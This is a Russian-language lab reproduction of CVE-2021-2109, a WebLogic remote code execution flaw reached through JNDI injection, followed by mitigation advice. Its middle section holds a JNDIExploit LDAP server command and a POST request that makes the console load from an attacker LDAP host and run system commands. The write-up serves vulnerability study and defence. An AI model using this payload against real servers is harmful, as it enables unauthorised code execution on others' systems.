
Пошаговое воспроизведение и анализ CVE-2021-2109, уязвимости удаленного выполнения кода в Weblogic Server через JNDI-инъекцию, с POC и рекомендациями по смягчению.
В январе 2021 года Oracle выпустила обновление безопасности, включающее 329 новых патчей безопасности для продуктов Oracle. В этом уведомлении особо упоминалось уведомление о безопасности Oracle WebLogic Server от 1 ноября 2020 года, касающееся уязвимости CVE-2020-14750. Клиентам настоятельно рекомендуется применить этот патч, а также другие патчи из этого уведомления. CVE-2021-2109 — это уязвимость удалённого выполнения кода в Weblogic. Уязвимость в основном обусловлена JNDI-инъекцией, что позволяет злоумышленнику удалённо выполнять код.
Затронуты следующие версии: Weblogic Server 10.3.6.0.0 Weblogic Server 12.1.3.0.0 Weblogic Server 12.2.1.3.0 Weblogic Server 12.2.1.4.0 Weblogic Server 14.1.1.0.0
Тестовая среда Weblogic Server разворачивается с помощью DOCKER; Weblogic Server доступен.


Запустите LDAP на локальной машине; его можно загрузить по адресу https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11. Команда: java -jar JNDIExploit-v1.11.jar -i 192.168.131.1

Отправьте POC-пакет JNDI-инъекции для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server: POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.131;1:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

Выполните системную команду ipconfig через переменную cmd


Выполните calc.exe через переменную cmd, чтобы открыть системный калькулятор


Системный калькулятор открыт

Рекомендации по безопасности для уязвимости удалённого выполнения кода CVE-2021-2109 Weblogic Server
Отключите протокол T3 Если вы не полагаетесь на протокол T3 для связи JVM, можно снизить влияние этой уязвимости, временно заблокировав протокол T3. 1). Войдите в консоль WebLogic, на странице конфигурации base_domain перейдите на вкладку «Безопасность», нажмите «Фильтр» и настройте фильтр. 2). В поле «Фильтр подключения» введите: weblogic.security.net.ConnectionFilterImpl, а в поле правил фильтра подключения введите: * * 7001 deny t3 t3s.
Отключите IIOP Войдите в консоль WebLogic, найдите опцию включения IIOP, снимите флажок и перезапустите сервер, чтобы изменения вступили в силу.
Временно закройте внешний доступ к /console/console.portal
Установите официальный патч безопасности